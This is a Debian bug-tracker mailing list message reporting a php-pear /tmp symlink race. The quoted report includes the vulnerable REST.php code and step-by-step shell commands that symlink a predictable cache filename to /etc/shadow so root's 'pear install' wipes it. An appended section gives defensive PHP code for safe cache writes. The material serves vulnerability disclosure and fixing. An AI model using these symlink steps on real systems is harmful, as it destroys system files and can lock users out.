[php-maint] Bug#759282: Bug#759282: [php-pear] "/tmp" symlink file clobbering
Ondřej Surý
ondrej at sury.org
Tue Aug 26 09:20:14 UTC 2014
Control: forcemerge -1 682157
Yes, it's a known bug that php-pear is not safe on multiuser systems.
Ondrej
On Mon, Aug 25, 2014, at 21:28, vladz wrote:
>
> Package: php-pear
> Version: 5.4.4-14+deb7u14
> Tags: security
>
> PEAR commands such as "pear install [...]" write cache data into
> predictable filenames located in "/tmp/". Unprivileged local users
> could use symlinks to clobber arbitrary files.
>
> Temporary filenames ("$cachefile" and "$cacheidfile") are generated with
> the code above. They are predictable as far as we know the extension
> name that is going to be installed (this name is used to construct the
> url for the MD5 checksum):
>
> $ cat -n /usr/share/php/PEAR/REST.php
> [...]
> 59 $cachefile = $this->config->get('cache_dir') . DIRECTORY_SEPARATOR .
> 60 md5($url) . 'rest.cachefile';
> [...]
> 194 $cacheidfile = $this->config->get('cache_dir') . DIRECTORY_SEPARATOR .
> 195 md5($url) . 'rest.cacheid';
>
> For instance, when installing the "Mail_mime" extension, the following
> filenames are used by PEAR:
>
> - /tmp/pear/cache/ff051dc5b96c95bf60e300d415b6c47erest.cachefile
> - /tmp/pear/cache/ff051dc5b96c95bf60e300d415b6c47erest.cacheid
>
> In this case, the "$url" used for md5 checksum is the following:
>
> $ printf "http://pear.php.net/rest/p/mail_mime/info.xml" | md5sum
> ff051dc5b96c95bf60e300d415b6c47e -
>
> To sum up, if a local user wants to clobber the "/etc/shadow" file, he
> runs:
>
> $ mkdir -p /tmp/pear/cache/
> $ ln -s /etc/shadow /tmp/pear/cache/ff051dc5b96c95bf60e300d415b6c47erest.cachefile
>
> Then when root runs PEAR, the file gets clobbered:
>
> # pear install Mail_mime
> [...]
> # du -sk /etc/shadow
> 0 /etc/shadow
>
> A function like tempnam() could be used instead. It creates a file with
> a unique filename (see http://php.net/manual/en/function.tempnam.php).
>
> Regards,
> --
> http://vladz.devzero.fr
> PGP key 8F7E2D3C from pgp.mit.edu
--
Ondřej Surý <ondrej at sury.org>
Knot DNS (https://www.knot-dns.cz/) – a high-performance DNS server
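
The tempnam() suggestion from the report, worked through as an added example; it is not PEAR's code and not the fix shipped for this bug. The helper names are hypothetical, the posix extension is assumed to be loaded, and the cache directory is assumed to sit under parent directories that other local users cannot write to.

```php
<?php
// Added example: hypothetical helpers, not PEAR's own code.

// Reject a cache directory that another local user could have prepared.
function assertPrivateCacheDir(string $dir): void
{
    $st = @lstat($dir); // lstat() so a symlinked directory is not followed
    if ($st === false || ($st['mode'] & 0170000) !== 0040000) {
        throw new RuntimeException("$dir is missing or not a real directory");
    }
    if ($st['uid'] !== posix_geteuid() || ($st['mode'] & 0022) !== 0) {
        throw new RuntimeException("$dir is not private to the current user");
    }
}

// Store $data under the same cache name REST.php uses, without ever
// opening that predictable path for writing.
function writeCacheEntry(string $cacheDir, string $url, string $data): string
{
    assertPrivateCacheDir($cacheDir);
    $final = $cacheDir . DIRECTORY_SEPARATOR . md5($url) . 'rest.cachefile';

    // tempnam() creates a new 0600 file with an unpredictable name. It falls
    // back to the system temp dir on failure, so verify where the file landed.
    $tmp = tempnam($cacheDir, 'rest');
    if ($tmp === false || dirname($tmp) !== realpath($cacheDir)) {
        if ($tmp !== false) { unlink($tmp); }
        throw new RuntimeException("could not create a temp file in $cacheDir");
    }
    // rename() replaces the directory entry itself: a symlink already sitting
    // at $final is discarded, its target is never written to.
    if (file_put_contents($tmp, $data) === false || !rename($tmp, $final)) {
        unlink($tmp);
        throw new RuntimeException("could not write $final");
    }
    return $final;
}

// Constructed demo: a stale symlink at the predictable name is replaced,
// and the file it pointed to keeps its contents.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'cache-demo-' . bin2hex(random_bytes(8));
mkdir($dir, 0700);
$url = 'http://pear.php.net/rest/p/mail_mime/info.xml';
$other = $dir . DIRECTORY_SEPARATOR . 'unrelated.txt';
file_put_contents($other, "keep me\n");
symlink($other, $dir . DIRECTORY_SEPARATOR . md5($url) . 'rest.cachefile');
$path = writeCacheEntry($dir, $url, "<xml/>");
var_dump(is_link($path), file_get_contents($other));
```

The ownership and mode check is what rejects a "/tmp/pear/cache" that another user created first; tempnam() alone does not help if the directory itself is under someone else's control.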